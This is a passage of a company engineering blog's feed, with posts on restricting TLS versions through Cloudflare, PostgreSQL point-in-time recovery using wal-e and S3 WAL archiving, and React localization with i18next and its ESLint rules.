      <content type="html"><![CDATA[<p><a href="https://neeto.com/neetocal">NeetoCal</a> is one of the products built under<a href="https://neeto.com">neeto</a>. NeetoCal makes it easier to manage meetings. Wewanted to allow users to use Zoom as one of the ways to have online meetings. Wesubmitted the NeetoCal app for approval to the Zoom team. The Zoom security teamnotified us that they could not approve the app, because the app was supportingTLS 1.0 and TLS 1.1.</p><p><img src="/blog_images/2023/upgrading-tls-using-cloudflare/zoom-tls-issue.png" alt="zoom tls issues"></p><p>We checked with SSLlabs and it said the same thing: the servers support TLS 1.0and TLS 1.1.<img src="/blog_images/2023/upgrading-tls-using-cloudflare/older-tls-support.png" alt="support for older TLS"></p><p>TLS 1.0 was published in 1999, and TLS 1.1 was published in 2006. Microsoft andother companies don't support these two versions of TLS. Even Heroku<a href="https://help.heroku.com/G0YVUNPG/how-do-i-disable-support-for-tls-1-0-or-1-1-on-a-heroku-app">doesn't support</a>it.</p><p>All our Neeto applications are hosted on Heroku. If Heroku doesn't support TLS1.0 and TLS 1.1, how come the server supports these older versions of TLS?</p><h2>Solving the TLS issue using Cloudflare</h2><p>We use <a href="https://www.cloudflare.com/">Cloudflare</a> as our DNS server for all Neetoproducts. Cloudflare allows us to proxy the request. It means that when the userhits neetocal.com, their request is not going to Heroku. Cloudflare willintercept the request, and then Cloudflare will make a request to the Herokuserver on behalf of the user. 
When Cloudflare makes this request to Heroku, it uses its own SSL certificate.</p><p>Cloudflare gives us control over the &quot;Minimum TLS version&quot; to support. We configured Cloudflare to not support TLS 1.0 and TLS 1.1.</p><p>The following video goes into step-by-step detail on how we configured this in Cloudflare.</p><iframe width="560" height="315" src="https://www.youtube.com/embed/sED8_Qwmi2w" title="Upgrading to TLS 1.2 using Cloudflare" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe><p><a href="https://www.cdn77.com/tls-test">CDN77</a> is the service we used in the video to check the TLS version.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Continuous backup of PostgreSQL in NeetoDeploy]]></title>
       <author><name>Abhishek T</name></author>
      <link href="https://www.bigbinary.com/blog/postgresql-continuos-rollback-feature"/>
      <updated>2023-08-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/postgresql-continuos-rollback-feature</id>
      <content type="html"><![CDATA[<p><a href="https://neeto.com/neetodeploy">NeetoDeploy</a> is a Heroku alternative fordeploying web applications. Currently, NeetoDeploy is being used by Neeto for allpull request review applications and the staging application. NeetoDeploy is aplatform as a service (PaaS) solution that makes it easy to manage and deployapplications with features like database backup, auto deployment from GitHub,live logs, SSL certificates management, auto scaling, and more.</p><p>NeetoDeploy's PostgreSQL add-on has a continuous backup feature. This featureallows you to roll your database back to a specific time in the past. We cansplit the continuous backup process into data backup and recovery. Let's discussthese steps in detail.</p><h2>Initial setup</h2><p>Let us create a new PostgreSQL cluster and populate it with some data.</p><h4>Creating parent database</h4><pre><code class="language-bash">initdb /usr/local/var/postgresql-parent</code></pre><h4>Creating some sample data</h4><p>Start the PostgreSQL server and log in using <code>psql</code>. Provide the role and password ifneeded.</p><pre><code class="language-bash">pg_ctl -D /usr/local/var/postgresql-parent startpsql -d postgres</code></pre><h4>Create a new table</h4><pre><code class="language-sql">postgres=#CREATE TABLE customers (  user_id SERIAL PRIMARY KEY,  username VARCHAR(50),  email VARCHAR(100),  registration_date DATE);</code></pre><h4>Seed sample data</h4><pre><code class="language-sql">postgres=#INSERT INTO customers  (username, email, registration_date)VALUES('johndoe', 'johndoe@example.com', '2021-01-01'),('janedoe', 'janedoe@example.com', '2021-02-15'),('bobsmith', 'bobsmith@example.com', '2021-03-10'),('sarahlee', 'sarahlee@example.com', '2021-04-05'),('maxwell', 'maxwell@example.com', '2021-05-20');</code></pre><h2>Data backup</h2><p>To perform recovery, we need to have access to the existing data. 
Hence we muststore all the database changes in a separate location, allowing us to utilizethis data for recovery.</p><p>This is where the<a href="https://www.postgresql.org/docs/current/wal-intro.html">Write Ahead Log (WAL)</a>in PostgreSQL comes into play. PostgreSQL follows a mechanism that writes alltransactions to the WAL before committing them to the table data files. Bypreserving the WAL, we can reconstruct the data by traversing the loggedtransactions. Utilizing the information stored in the WAL, we can systematicallyreapply the recorded transactions to recreate the data and achieve the desiredrecovery. Your WAL files are in your PostgreSQL data directory's <code>pg_wal</code>folder.</p><h3>WAL archiving</h3><p>As data modifications occur in the databases, new WAL files are generated whileolder WAL files are eventually discarded. Therefore, it is crucial to store theWAL files before they are deleted. Here we will use an<a href="https://aws.amazon.com/s3/">AWS S3 bucket</a> to store our WAL files. Also, wewill use <a href="https://github.com/wal-e/wal-e">wal-e</a> and<a href="https://pypi.org/project/envdir/">envdir</a> to simplify the process.</p><h4>Install helper modules</h4><pre><code class="language-bash">python3 -m pip install wal-e envdir</code></pre><p>If you face any dependency issues, please refer<a href="https://github.com/wal-e/wal-e">wal-e</a> to fix them.</p><h4>Store AWS S3 credentials</h4><p>To use &quot;envdir&quot; with your AWS credentials, store them in a folder. 
The followingcode snippet demonstrates how to accomplish this:</p><pre><code class="language-bash">mkdir ~/wal-e.envecho &quot;YOUR_AWS_REGION&quot; &gt; ~/wal-e.env/AWS_REGIONecho &quot;YOUR_AWS_SECRET_ACCESS_KEY&quot; &gt; ~/wal-e.env/AWS_SECRET_ACCESS_KEYecho &quot;YOUR_AWS_ACCESS_KEY_ID&quot; &gt; ~/wal-e.env/AWS_ACCESS_KEY_IDecho &quot;YOUR_AWS_STORAGE_PATH&quot; &gt; ~/wal-e.env/WALE_S3_PREFIX</code></pre><h4>Configure WAL archiving</h4><p>Now, let's configure PostgreSQL to store the WAL files in your S3 bucket beforethey are deleted. Open your PostgreSQL configuration file &quot;postgresql.conf&quot;,which is located in your data directory i.e.,&quot;/usr/local/var/postgresql-parent&quot;, and make the following changes.</p><pre><code class="language-bash"># To enable WAL archiving.archive_mode = on# Determines how much information is written to the WAL.wal_level = replica# Force PostgreSQL to switch WAL file in every 60 secondsarchive_timeout = 60# Command for pushing the wal files to the S3 bucket.archive_command = 'envdir ~/wal-e.env wal-e wal-push %p'</code></pre><p>You can find more information about the above configurations by referring tothis<a href="https://www.postgresql.org/docs/current/runtime-config-wal.html#GUC-ARCHIVE-COMMAND">documentation</a>.</p><p>Now let's restart the server.</p><pre><code class="language-bash"> data_directory=&quot;/usr/local/var/postgresql-parent&quot; pg_ctl -D $data_directory restart -l $data_directory/postgresql.log</code></pre><p>You can watch the PostgreSQL logs like this.</p><pre><code class="language-bash"> tail -f /usr/local/var/postgresql-parent/postgresql.log</code></pre><p>After starting your server, monitor the PostgreSQL logs. If you don't observeany WAL archive logs even after 60 seconds, it is because a WAL file switch willonly occur if there are any modifications. To generate the desired outcome, makeupdates in the database. 
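</p><p>For example, any small committed write is enough to force fresh WAL activity. A hypothetical write against the <code>customers</code> table created earlier:</p>

```sql
-- Any committed change generates WAL; this row exists only for illustration.
INSERT INTO customers (username, email, registration_date)
VALUES ('walcheck', 'walcheck@example.com', '2021-06-01');
```
<p>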
Upon doing so, you will be able to see lines similar to the following in your PostgreSQL logs:</p><pre><code>Message: 'MSG: completed archiving to a file\nDETAIL: Archiving to &quot;s3://neeto-deploy-backups/local/wal_005/000000020000000000001.lzo&quot; complete at 158.209KiB/s.\nSTRUCTURED: time=2023-05-18T06:22:27.613242-00 pid=263 action=push-wal key=s3://neeto-deploy-backups/local/wal_005/000000020000000000001.lzo prefix=local/ rate=158.209 seg=000000020000000000001 state=complete'</code></pre><h3>Base backup</h3><p>Since we have enabled WAL archiving, all new changes are stored in the bucket as WAL files. However, what about the data we created before configuring WAL archiving? To ensure a complete recovery, we also need that data. Therefore, we need to take a base backup of our database. The following command initiates the base backup process and pushes it to the S3 bucket.</p><pre><code class="language-bash">envdir ~/wal-e.env wal-e backup-push /usr/local/var/postgresql-parent</code></pre><p>Running the above command yields the following output.</p><pre><code>wal_e.main   INFO     MSG: starting WAL-E
DETAIL: The subcommand is &quot;backup-push&quot;.
STRUCTURED: time=2023-05-18T06:24:27.613242-00 pid=41178
wal_e.worker.upload INFO     MSG: begin uploading a base backup volume
DETAIL: Uploading to &quot;s3://neeto-deploy-backups/local/basebackups_005/base_000000010000000000005_00000040/tar_partitions/part_00000000.tar.lzo&quot;.
STRUCTURED: time=2023-05-18T06:24:29.527622-00 pid=41178
wal_e.worker.upload INFO     MSG: finish uploading a base backup volume
DETAIL: Uploading to &quot;s3://neeto-deploy-backups/local/basebackups_005/base_000000010000000000005_00000040/tar_partitions/part_00000000.tar.lzo&quot; complete at 1459.68KiB/s.
STRUCTURED: time=2023-05-18T06:24:33.121716-00 pid=41178
NOTICE:  all required WAL segments have been archived</code></pre><p>After completing the base backup, you can verify the presence of the base backup folder in your S3 bucket. 
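</p><p>Conceptually, point-in-time recovery is just &quot;base backup + replay of logged changes up to a target time&quot;. The following toy Python sketch illustrates that idea only; it has nothing to do with PostgreSQL's actual WAL format:</p>

```python
from dataclasses import dataclass

# Toy illustration of point-in-time recovery: a "base backup" snapshot plus an
# ordered log of changes (the WAL analogue). Recovery starts from the snapshot
# and replays log entries committed at or before the recovery target time.

@dataclass
class LogEntry:
    ts: int        # toy "commit time"
    key: str
    value: object  # None stands for a deletion

def recover(base_backup, wal, target_ts):
    db = dict(base_backup)
    for entry in sorted(wal, key=lambda e: e.ts):
        if entry.ts > target_ts:
            break  # stop before the change we want to undo
        if entry.value is None:
            db.pop(entry.key, None)
        else:
            db[entry.key] = entry.value
    return db

base = {"customers": ["johndoe", "janedoe"]}
wal = [
    LogEntry(10, "customers", ["johndoe", "janedoe", "bobsmith"]),
    LogEntry(20, "customers", None),  # the accidental "DROP TABLE"
]

# Rolling back to a point before ts=20 brings the table back.
assert recover(base, wal, target_ts=15) == {
    "customers": ["johndoe", "janedoe", "bobsmith"]
}
```
<p>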
Now we have the backup, and new WAL files are being pushed to our bucket.</p><h2>Data recovery</h2><p>Let's consider a scenario where you need to perform a rollback. Suppose you accidentally deleted a table from your database that contained multiple records, making it impractical to recall and reinsert them manually. As a first step, make a note of the time at which the table was deleted. For instance, let's say it occurred on 2023-05-18 11:57:11 UTC. The objective is to roll back to a point before that time. Let's roll back to 2023-05-18 at 11:57:00 UTC.</p><h3>Let's make a mistake</h3><p>We are going to drop a table.</p><pre><code class="language-sql">postgres=#DROP TABLE customers;</code></pre><p>Note the time the table got deleted. Here it is 2023-05-18 11:57:11 UTC. Now let's discuss how we can restore the deleted table.</p><h3>Creating a new data directory</h3><p>Let's create a new data directory where we can recover the data.</p><pre><code class="language-bash">initdb /usr/local/var/postgresql-child</code></pre><h3>Fetch the base backup</h3><p>The base backup serves as the starting point, while the remaining data will be regenerated by PostgreSQL using the WAL files. To fetch the base backup, you can use the following command.</p><pre><code class="language-bash">envdir ~/wal-e.env wal-e backup-fetch /usr/local/var/postgresql-child LATEST</code></pre><p>The &quot;LATEST&quot; tag will pull the latest base backup if multiple base backups are in the bucket. On running the above command you will receive an output similar to the following.</p><pre><code>wal_e.main   INFO     MSG: starting WAL-E
DETAIL: The subcommand is &quot;backup-fetch&quot;.
STRUCTURED: time=2023-05-18T06:29:22.826910-00 pid=41789
wal_e.worker.s3.s3_worker INFO     MSG: beginning partition download
DETAIL: The partition being downloaded is part_00000000.tar.lzo.
HINT: The absolute S3 key is local/basebackups_005/base_000000010000000000000005_00000040/tar_partitions/part_00000000.tar.lzo.
STRUCTURED: time=2023-05-18T06:29:24.674572-00 pid=41789</code></pre><h3>Configuring recovery</h3><p>Now, we need to regenerate the remaining data from the WAL files. To do that, make the following changes in the PostgreSQL configuration file.</p><pre><code class="language-bash"># postgresql.conf

# Command to fetch each WAL file from the bucket.
restore_command = 'envdir ~/wal-e.env wal-e wal-fetch %f %p'

# Time at which we want to stop recovery.
recovery_target_time = '2023-05-18 11:57:00'</code></pre><p>We can stop the parent server since it is no longer needed.</p><pre><code class="language-bash">pg_ctl -D /usr/local/var/postgresql-parent stop</code></pre><p>To initiate the server in recovery mode and to allow PostgreSQL to regenerate the data using the WAL files, create a file named &quot;recovery.signal&quot; in the new data directory.</p><pre><code class="language-bash">touch /usr/local/var/postgresql-child/recovery.signal</code></pre><p>Start the child server pointing to the new data directory by running the following command.</p><pre><code class="language-bash">data_directory=&quot;/usr/local/var/postgresql-child&quot;
pg_ctl -D $data_directory start -l $data_directory/postgresql.log</code></pre><p>If you examine the PostgreSQL logs, you will notice that the recovery process is paused at the specified time.</p><pre><code>2023-05-18 12:07:41.688 IST [43159] LOG:  restored log file &quot;000000010000000000006&quot; from archive
2023-05-18 12:07:41.692 IST [43159] LOG:  recovery stopping before commit of transaction 743, time 2023-05-18 11:57:11.135927+05:30
2023-05-18 12:07:41.692 IST [43159] LOG:  pausing at the end of recovery
2023-05-18 12:07:41.692 IST [43159] HINT:  Execute pg_wal_replay_resume() to promote.</code></pre><p>It's important to note that you won't be able to connect to the server using psql at this point because it is not ready to accept connections. By default, PostgreSQL pauses the recovery process after reaching the recovery target time. To change this behavior and allow the server to accept connections after reaching the target time, add the following configuration to your PostgreSQL configuration file.</p><pre><code class="language-bash">recovery_target_action = 'promote'</code></pre><p>After making the above change, restart the server once again by running the following command.</p><pre><code class="language-bash">data_directory=&quot;/usr/local/var/postgresql-child&quot;
pg_ctl -D $data_directory restart -l $data_directory/postgresql.log</code></pre><p>Now, you will observe that the server is ready to accept connections after completing the recovery process. Once the recovery is successfully completed, PostgreSQL automatically deletes the &quot;recovery.signal&quot; file. You can verify its deletion from your data directory.</p><p>Once the server is up and ready, connect to it and check if the deleted table is present. You will find that the deleted table is now restored and available in the database.</p><pre><code class="language-sql">postgres=#select * from customers;
 user_id | username |        email         | registration_date
---------+----------+----------------------+-------------------
       1 | johndoe  | johndoe@example.com  | 2021-01-01
       2 | janedoe  | janedoe@example.com  | 2021-02-15
       3 | bobsmith | bobsmith@example.com | 2021-03-10
       4 | sarahlee | sarahlee@example.com | 2021-04-05
       5 | maxwell  | maxwell@example.com  | 2021-05-20
(5 rows)</code></pre><p>To learn more about PostgreSQL continuous backup, refer to the <a href="https://www.postgresql.org/docs/current/continuous-archiving.html">official PostgreSQL documentation</a>.</p><h2>Challenges faced</h2><h3>Restoration of PostgreSQL roles</h3><p>When we restored the PostgreSQL database, the roles and passwords were also restored. However, in the continuous rollback feature we create a new database with the desired data, so we should use a new role and password to ensure security. We resolved this by changing the restored role and password to new ones.</p><h3>Early recovery completion</h3><p>Another issue we encountered was the recovery of the database completing before reaching the specified target time. Suppose no activity occurs in the database, and we attempt to roll back to the current time. PostgreSQL initiates the recovery process and recovers all the available WAL files. However, it fails to locate the target time since no corresponding WAL file is available for the given timestamp. PostgreSQL raises the following error in this scenario and shuts down the server.</p><pre><code>2023-05-18 02:12:15.846 UTC [76] LOG:  last completed transaction was at log time 2023-05-18 02:04:02.755919+00
2023-05-18 02:12:15.846 UTC [76] FATAL:  recovery ended before configured recovery target was reached
2023-05-18 02:12:15.850 UTC [75] LOG:  startup process (PID 76) exited with exit code 1
2023-05-18 02:12:15.850 UTC [75] LOG:  terminating any other active server processes
2023-05-18 02:12:15.853 UTC [75] LOG:  shutting down due to startup process failure
2023-05-18 02:12:15.859 UTC [75] LOG:  database system is shut down</code></pre><p>In this case, we can remove the specified target time and restart the server. If we do not provide any target time, PostgreSQL will recover until the last available WAL file, which will contain the latest transaction of our database.</p><h3>Recovery is an asynchronous process</h3><p>As mentioned above, we must update the restored role and password to new ones.</p><pre><code class="language-bash">update-role-and-password(){
  # Create a new temporary user, as we cannot update the current session user.
  psql -d &lt;DB_NAME&gt; \
    -c &quot;CREATE USER tempuser WITH SUPERUSER LOGIN PASSWORD 'tempuser-pwd';&quot;

  # Log in as the temporary user and update the parent role and password.
  PGUSER=tempuser PGPASSWORD=tempuser-pwd psql -d &lt;DB_NAME&gt; \
    -c &quot;ALTER ROLE &lt;parent-role&gt; RENAME TO &lt;NEW_ROLE&gt;; ALTER ROLE &lt;NEW_ROLE&gt; WITH PASSWORD &lt;NEW_PASSWORD&gt;;&quot;

  # Log in as the new user and remove the temporary user.
  PGUSER=&lt;NEW_ROLE&gt; PGPASSWORD=&lt;NEW_PASSWORD&gt; psql -d &lt;DB_NAME&gt; \
    -c &quot;DROP ROLE tempuser;&quot;
}

# Start the server in recovery mode.
pg_ctl -D /usr/local/var/postgresql-child start

# Call the method to update role and password.
update-role-and-password</code></pre><p>If you try the above code, you will encounter the following error.</p><pre><code>ERROR:  cannot execute CREATE ROLE in a read-only transaction</code></pre><p>Since the recovery process is asynchronous, the system may attempt to update the role before the recovery completes. Note that the server is in read-only mode during recovery, which leads to the error mentioned above.</p><p>To solve this issue, it is necessary to determine when the recovery process has completed. This can be achieved by checking for the existence of the &quot;recovery.signal&quot; file in a loop.</p><pre><code class="language-bash">wait_until_recovery_is_completed(){
  recovery_signal_path=&quot;/usr/local/var/postgresql-child/recovery.signal&quot;
  while [ -f &quot;$recovery_signal_path&quot; ]; do
    sleep 1  # Wait for 1 second before checking again.
  done
}</code></pre><pre><code>pg_ctl -D /usr/local/var/postgresql-child start
wait_until_recovery_is_completed
update-role-and-password</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[React localization with i18next and react-i18next libraries]]></title>
       <author><name>Joseph Mathew</name></author>
      <link href="https://www.bigbinary.com/blog/react-localization"/>
      <updated>2023-07-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/react-localization</id>
      <content type="html"><![CDATA[<p>Localization is the process of designing and developing your products that canadapt to various languages and regions, without requiring a complete overhaul.This can involve tasks such as translating the text into different languages,adjusting the format of dates and times, changing the currencies and many more.</p><h2>Why is localization important?</h2><p>Localization is important for overcoming language barriers and making yourproducts accessible to people from different cultures and regions.</p><p>For example, let's say you are developing a product for a company that hascustomers in multiple countries, and the product is currently only available inEnglish. This means that potential customers who speak other languages may beless likely to use the product or may have difficulty navigating it. Byimplementing localization in the product, you can easily add support for otherlanguages without requiring extensive code changes. This will make the productmore accessible to a wider range of audiences and increase the likelihood of theproduct being used by people in different regions.</p><p>Localization is more than just translating text. It also involves adaptingvarious aspects of the products, including date and time formats, currencies,and other cultural conventions to create a more native experience for the targetaudience. Providing a localized experience can help the product better meet theneeds and expectations of users in different regions, leading to better userengagement and satisfaction.</p><h2>How to implement localization in React?</h2><p>To implement localization effectively, it's important to choose a suitablelocalization package that works well with the chosen framework. 
In<a href="https://www.neeto.com/">Neeto products</a>, the<a href="https://www.npmjs.com/package/i18next">i18next</a> and<a href="https://www.npmjs.com/package/react-i18next">react-i18next</a> libraries are usedfor localization because they are well-maintained, have good documentation andare easy to use. <code>i18next</code> provides a flexible and powerful translation engine,while <code>react-i18next</code> provides hooks and components for managing translations inReact components. Before getting into the details of how to implementlocalization using these libraries, let's first understand some of the termsthat would be used.</p><h4>Translation file</h4><p>A translation file is a file that contains a set of translated strings for aparticular language. Each supported language will have its own dedicatedtranslation file.</p><p>For example, a translation file for English would contain English translationsfor all the strings in the application.</p><pre><code class="language-json">{  &quot;browseProducts&quot;: &quot;Browse Products&quot;,  &quot;addToCart&quot;: &quot;Add to Cart&quot;}</code></pre><p>A translation file for Spanish would contain Spanish translations for all thestrings in the application.</p><pre><code class="language-json">{  &quot;browseProducts&quot;: &quot;Explorar productos&quot;,  &quot;addToCart&quot;: &quot;Agregar al carrito&quot;}</code></pre><h4>Translation key</h4><p>A translation key is a unique identifier used to look up a translated string ina translation file. A translation key can be any string that you want and it istypically a short, descriptive string that represents the text to be translated.In the above example, <code>browseProducts</code> and <code>addToCart</code> are the translation keys.</p><p>In some cases, translation keys are grouped together based on the context inwhich they are used or the component that they are used in. For instance,translation keys for buttons may be grouped together. 
In this case, a prefix isemployed to group the translation keys together. To access a specifictranslation string within a group, you can use the prefix followed by a dot andthen the translation key. Let's see an example of this.</p><pre><code class="language-json">{  &quot;button&quot;: {    &quot;submit&quot;: &quot;Submit&quot;,    &quot;cancel&quot;: &quot;Cancel&quot;  }}</code></pre><p>In this example, all the translation keys for buttons are grouped together underthe prefix <code>button</code>. To access the translation string for the button <code>Submit</code>,the translation key <code>button.submit</code> is used. Similarly, for the button <code>Cancel</code>,the translation key <code>button.cancel</code> is used. The nesting of translation keys isnot restricted to a single level, it can be extended to multiple levels asnecessary. However, it's best to keep the nesting to a minimum to avoid makingthe keys overly complex and difficult to manage.</p><p>Now let's see how to use translation files and translation keys to implementlocalization in React.</p><p>As mentioned earlier, in <a href="https://neeto.com">neeto</a>, the <code>i18next</code> and<code>react-i18next</code> libraries are used for localization. Both these librariesprovide a translation function named <code>t</code> that takes a translation key as anargument and returns the corresponding translated string from the translationfile.</p><p>The <code>t</code> function provided by <code>i18next</code> is a generic translation function thatcan be used in any part of your JavaScript application. On the other hand, the<code>t</code> function offered by <code>react-i18next</code> is intended exclusively for usage withinthe React components and hooks. It can be accessed via the <code>useTranslation</code>hook.</p><p><code>react-i18next</code> is essentially a wrapper over the <code>i18next</code> engine. 
It offersthese additional facilities:</p><ul><li><p><strong>Language switching</strong>: The <code>useTranslation</code> hook provided by <code>react-i18next</code>simplifies the process of language switching by providing access to the <code>i18n</code>instance. This powerful hook not only streamlines the switch but also ensuresthat translations are promptly updated by triggering an automatic re-render ofthe component whenever the language is changed.</p><pre><code class="language-js">const { i18n } = useTranslation();i18n.changeLanguage(&quot;en-US&quot;);</code></pre></li><li><p><strong>Namespace for loading translations on demand</strong>: As your project expands, itbecomes essential to implement both code splitting and on-demand translationloading. Loading all translations upfront can result in suboptimal load timesfor your website. By using the namespace feature provided by the<code>useTranslation</code> hook, you can efficiently organize your translations intoseparate files based on logical divisions or components. This enables you todynamically load translations when they are required, instead of loading alltranslations simultaneously. This approach significantly improves load times,ensuring a smoother user experience.</p><pre><code class="language-js">// the t function will be set to that namespace as defaultconst { t } = useTranslation(&quot;ns1&quot;);t(&quot;key&quot;); // will be looked up from namespace ns1</code></pre></li><li><p><strong>Trans component for complex React elements</strong>: Apart from the<code>useTranslation</code> hook, <code>react-i18next</code> offers a powerful component called<code>Trans</code>. This component can be used for translating strings that contain HTMLor React nodes. We will see more about this component later in this blog.</p></li></ul><p>Now, let's take an example to see how these libraries can be used to implementlocalization in React. 
Consider a simple online store application that displaysa welcome message to the customer and our goal is to show this message in bothEnglish and Spanish based on the customer's language preference.</p><p>For this, first you need to create a translation file for each language that youwant to support. In this case, you need to create two translation files: one forEnglish and one for Spanish.</p><pre><code class="language-json">// en.json{  &quot;welcomeToOnlineStore&quot;: &quot;Welcome to our online store!&quot;}</code></pre><pre><code class="language-json">// es.json{  &quot;welcomeToOnlineStore&quot;: &quot;Bienvenidos a nuestra tienda en lnea!&quot;}</code></pre><p>Next, you need to initialize <code>i18next</code> and <code>react-i18next</code> in your application.</p><pre><code class="language-js">import i18n from &quot;i18next&quot;;import { initReactI18next } from &quot;react-i18next&quot;;import en from &quot;../translations/en.json&quot;;import es from &quot;../translations/es.json&quot;;i18n.use(initReactI18next).init({  resources: { en: { translation: en }, es: { translation: es } },  fallbackLng: &quot;en&quot;,});export default i18n;</code></pre><p>In this step, the <code>i18next</code> and <code>react-i18next</code> libraries are imported andinitialized with the translation files created in the first step. Additionally,the fallback language is set to English. 
This means that if a translation is notavailable for the current language, the translation for English will be usedinstead.</p><p>Now you can use the <code>t</code> function to translate strings as shown below.</p><pre><code class="language-js">import { useTranslation } from &quot;react-i18next&quot;;const WelcomeMessage = () =&gt; {  const { t } = useTranslation();  return &lt;div&gt;{t(&quot;welcomeToOnlineStore&quot;)}&lt;/div&gt;;};export default WelcomeMessage;</code></pre><p>Here, if the current language is English, the translated string for the<code>welcomeToOnlineStore</code> key will be <code>Welcome to our online store!</code>. If thecurrent language is Spanish, the translated string will be<code>Bienvenidos a nuestra tienda en lnea!</code>. If the current language is any otherlanguage, the translated string will be <code>Welcome to our online store!</code> sincetranslation resources have not been provided for other languages and thefallback language is set to English.</p><p>At this point, you might be wondering how to set the current language in yourapplication. This is accomplished by using the i18next language detector. Thei18next language detector is a library that detects the current language of theuser's browser and sets it as the current language in your application. To usethe i18next language detector, you need to install the<a href="https://www.npmjs.com/package/i18next-browser-languagedetector">i18next-browser-languagedetector</a>package and initialize it in your application. 
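</p><p>Installation is a standard npm dependency (command assumes npm; use your package manager's equivalent if you are on Yarn or pnpm):</p>

```shell
npm install i18next-browser-languagedetector
```
<p>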
To initialize it, you can modify the code snippet that you saw earlier for initializing <code>i18next</code> and <code>react-i18next</code> as shown below.</p><pre><code class="language-js">import i18n from &quot;i18next&quot;;
import LanguageDetector from &quot;i18next-browser-languagedetector&quot;;
import { initReactI18next } from &quot;react-i18next&quot;;

import en from &quot;../translations/en.json&quot;;
import es from &quot;../translations/es.json&quot;;

i18n
  .use(LanguageDetector)
  .use(initReactI18next)
  .init({
    resources: { en: { translation: en }, es: { translation: es } },
    fallbackLng: &quot;en&quot;,
  });

export default i18n;</code></pre><p>Now that you have gained a fundamental understanding of how to use <code>i18next</code> and <code>react-i18next</code> to implement localization in your React applications, let's explore the best practices followed at <a href="https://neeto.com">neeto</a> for localization.</p><h2>Best Practices followed at Neeto for localization</h2><p>At <a href="https://neeto.com">neeto</a>, a set of best practices has been developed for localization, which has proven effective in improving code quality and maintainability. To ensure that these best practices are consistently followed, a corresponding set of ESLint rules has been created. These ESLint rules are available in the <a href="https://www.npmjs.com/package/@bigbinary/eslint-plugin-neeto">eslint-plugin-neeto</a> package. <code>eslint-plugin-neeto</code> is an ESLint plugin that contains a set of ESLint rules that enforce the best practices followed at neeto. Let us now see the rules that are available in <code>eslint-plugin-neeto</code> for localization, along with the motivations behind their creation.</p><h3>hard-coded-strings-should-be-localized</h3><p>If a developer misses hard-coded strings that should be localized, it can result in a mix of localized and non-localized strings within the application.
This can create an inconsistent user experience, where some strings are correctly translated and others are not. To avoid this scenario, we have created the <code>hard-coded-strings-should-be-localized</code> ESLint rule. This rule helps to ensure that all hard-coded strings that should be localized are indeed localized.</p><p><img src="/blog_images/2023/react-localization/hard-coded-strings-should-be-localized.gif" alt="hard-coded-strings-should-be-localized rule"></p><h3>no-missing-localization</h3><p>This rule detects localization keys that do not have an associated value in the translation file. In other words, if a translation key passed to the <code>t</code> function is not present in any of the translation files, this rule will flag it as an error. This ensures that all localized strings are properly translated, thereby avoiding any inconsistencies that can negatively impact the user experience. Moreover, it reduces the risk of errors and bugs caused by missing translations.</p><p><img src="/blog_images/2023/react-localization/no-missing-localization.gif" alt="no-missing-localization rule"></p><h3>no-multiple-translation-functions-under-same-parent</h3><p>This rule prevents the usage of multiple translation functions under the same JSX parent. The goal is to prevent breaking up sentences into multiple parts using multiple translation keys, which can be problematic when translating from one language to another because the order of words may change. For instance, adjectives in English typically come before the noun they modify, whereas in Spanish, they usually come after the noun.</p><p>Let's consider an example to understand this better.
Suppose the sentence <code>I have a {color} car</code> needs to be translated in the below example, where <code>color</code> is a variable that can have different values.</p><pre><code class="language-js">const CarInfo = ({ color }) =&gt; &lt;div&gt;I have a {color} car&lt;/div&gt;;</code></pre><p>The first thought that comes to mind is to use three translation keys, one for <code>I have a</code>, one for <code>car</code>, and one for the value of the <code>color</code> variable. This would result in the following code:</p><pre><code class="language-js">import { useTranslation } from &quot;react-i18next&quot;;

const CarInfo = ({ color }) =&gt; {
  const { t } = useTranslation();

  return (
    &lt;div&gt;
      {t(&quot;iHaveA&quot;)} {t(color)} {t(&quot;car&quot;)}
    &lt;/div&gt;
  );
};</code></pre><p>Here, the translation file for English will be:</p><pre><code class="language-json">{
  &quot;iHaveA&quot;: &quot;I have a&quot;,
  &quot;car&quot;: &quot;car&quot;,
  &quot;red&quot;: &quot;red&quot;
}</code></pre><p>And the translation file for Spanish will be:</p><pre><code class="language-json">{
  &quot;iHaveA&quot;: &quot;Tengo un&quot;,
  &quot;car&quot;: &quot;coche&quot;,
  &quot;red&quot;: &quot;rojo&quot;
}</code></pre><p>If the variable <code>color</code> has the value <code>red</code>, the translated sentence in Spanish will be <code>Tengo un rojo coche</code>. However, this translation is incorrect since the adjective <code>rojo</code> (red) precedes the noun <code>coche</code> (car), which goes against the usual word order in Spanish. As previously mentioned, adjectives in Spanish typically come after the noun they modify. Hence, the correct translation of the sentence in Spanish would be <code>Tengo un coche rojo</code>. Now let's see how to solve this issue.</p><p>To address this problem, you can use the interpolation feature in <code>i18next</code>.</p><p>Interpolation is a feature that allows us to insert dynamic values into the translated string.
In this case, the interpolation feature can be used to insert the value of the <code>color</code> variable into the translated string. Interpolation uses the <code>{{}}</code> syntax: the variable name is placed inside the <code>{{}}</code> syntax, and the value of the variable is passed as an object to the <code>t</code> function. Let's modify the above example to use the interpolation feature.</p><pre><code class="language-js">import { useTranslation } from &quot;react-i18next&quot;;

const CarInfo = ({ color }) =&gt; {
  const { t } = useTranslation();

  return &lt;div&gt;{t(&quot;iHaveACar&quot;, { color: t(color) })}&lt;/div&gt;;
};</code></pre><p>Here, the translation file for English will be:</p><pre><code class="language-json">{
  &quot;iHaveACar&quot;: &quot;I have a {{color}} car&quot;,
  &quot;red&quot;: &quot;red&quot;
}</code></pre><p>And the translation file for Spanish will be:</p><pre><code class="language-json">{
  &quot;iHaveACar&quot;: &quot;Tengo un coche {{color}}&quot;,
  &quot;red&quot;: &quot;rojo&quot;
}</code></pre><p>In this case, the Spanish translation would be <code>Tengo un coche rojo</code>, which is correct. As you can see here, with the interpolation feature, you have the flexibility to adjust the word order in the translated sentence by modifying the placement of the variable based on the language. This is not possible when breaking up the sentence into multiple parts.</p><p>In short, you should avoid breaking up sentences into multiple parts using multiple translation keys. i18next offers various methods to accomplish this, and interpolation is one of them. Another scenario where you should avoid breaking up sentences into multiple parts is when the sentence contains HTML or React elements.
